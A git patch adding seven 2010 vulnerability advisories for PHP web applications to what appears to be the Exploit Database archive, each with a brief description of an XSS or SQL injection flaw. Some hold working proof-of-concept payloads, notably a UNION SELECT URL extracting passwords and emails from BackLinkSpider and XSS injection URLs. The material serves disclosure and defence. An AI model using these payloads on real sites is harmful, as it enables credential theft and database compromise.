From 5eff4e51ec9407d59dadf56c715a9c2a6538cb58 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 14 Jul 2014 04:38:26 +0000 Subject: [PATCH] Updated 07_14_2014 --- files.csv | 7 +++++++ platforms/php/webapps/34040.txt | 9 +++++++++ platforms/php/webapps/34041.txt | 22 ++++++++++++++++++++++ platforms/php/webapps/34042.txt | 9 +++++++++ platforms/php/webapps/34043.txt | 9 +++++++++ platforms/php/webapps/34044.txt | 7 +++++++ platforms/php/webapps/34045.txt | 7 +++++++ platforms/php/webapps/34046.txt | 12 ++++++++++++ 8 files changed, 82 insertions(+) create mode 100755 platforms/php/webapps/34040.txt create mode 100755 platforms/php/webapps/34041.txt create mode 100755 platforms/php/webapps/34042.txt create mode 100755 platforms/php/webapps/34043.txt create mode 100755 platforms/php/webapps/34044.txt create mode 100755 platforms/php/webapps/34045.txt create mode 100755 platforms/php/webapps/34046.txt diff --git a/files.csv b/files.csv index fbbc9ad3d..093c2920c 100755 --- a/files.csv +++ b/files.csv @@ -30653,3 +30653,10 @@ id,file,description,date,author,platform,type,port 34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0 34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0 34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0 +34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 'admin/index.php' HTML Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 'components.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 'index.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +34043,platforms/php/webapps/34043.txt,"360 Web Manager 3.0 'webpages-form-led-edit.php' SQL Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script 'index.php' Cross Site Scripting Vulnerability",2010-05-26,indoushka,php,webapps,0 +34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 'cat_id' Parameter SQL Injection Vulnerability",2010-05-27,"sniper ip",php,webapps,0 +34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 Multiple Cross Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0 diff --git a/platforms/php/webapps/34040.txt b/platforms/php/webapps/34040.txt new file mode 100755 index 000000000..7fb1e824b --- /dev/null +++ b/platforms/php/webapps/34040.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40373/info + +razorCMS is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +razorCMS 1.0 Stable is vulnerable; other versions may also be affected. + +
\ No newline at end of file diff --git a/platforms/php/webapps/34041.txt b/platforms/php/webapps/34041.txt new file mode 100755 index 000000000..d6d73bad8 --- /dev/null +++ b/platforms/php/webapps/34041.txt @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/40374/info + +GetSimple CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +GetSimple CMS 2.01 is vulnerable; prior versions may also be affected. + +
+ + + + + + + + + +
+ diff --git a/platforms/php/webapps/34042.txt b/platforms/php/webapps/34042.txt new file mode 100755 index 000000000..ab01f4b34 --- /dev/null +++ b/platforms/php/webapps/34042.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40375/info + +RuubikCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +RuubikCMS 1.0.3 is vulnerable; other versions may also be affected. + +
\ No newline at end of file diff --git a/platforms/php/webapps/34043.txt b/platforms/php/webapps/34043.txt new file mode 100755 index 000000000..7d91d19e3 --- /dev/null +++ b/platforms/php/webapps/34043.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40378/info + +360 Web Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +360 Web Manager 3.0 is vulnerable; other versions may also be affected. + +http://www.example.com/adm/content/webpages/webpages-form-led-edit.php?IDFM=-1+ANY_SQL_HERE+--+ \ No newline at end of file diff --git a/platforms/php/webapps/34044.txt b/platforms/php/webapps/34044.txt new file mode 100755 index 000000000..352d6dd72 --- /dev/null +++ b/platforms/php/webapps/34044.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/40381/info + +md5 Encryption Decryption PHP Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/MD5/index.php/>"> \ No newline at end of file diff --git a/platforms/php/webapps/34045.txt b/platforms/php/webapps/34045.txt new file mode 100755 index 000000000..bad59b118 --- /dev/null +++ b/platforms/php/webapps/34045.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/40398/info + +BackLinkSpider is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://example.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb-- \ No newline at end of file diff --git a/platforms/php/webapps/34046.txt b/platforms/php/webapps/34046.txt new file mode 100755 index 000000000..61229f263 --- /dev/null +++ b/platforms/php/webapps/34046.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/40400/info + +BackLinkSpider is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +BackLinkSpider 1.3.1774.0 is vulnerable; other versions may also be affected. + + +http://www.example.com/links.php?cat_id=[XSS] +http://www.example.com/links.php?siteid=[XSS] +http://www.example.com/links.php?cat_id=1&cat_name=1[XSS] \ No newline at end of file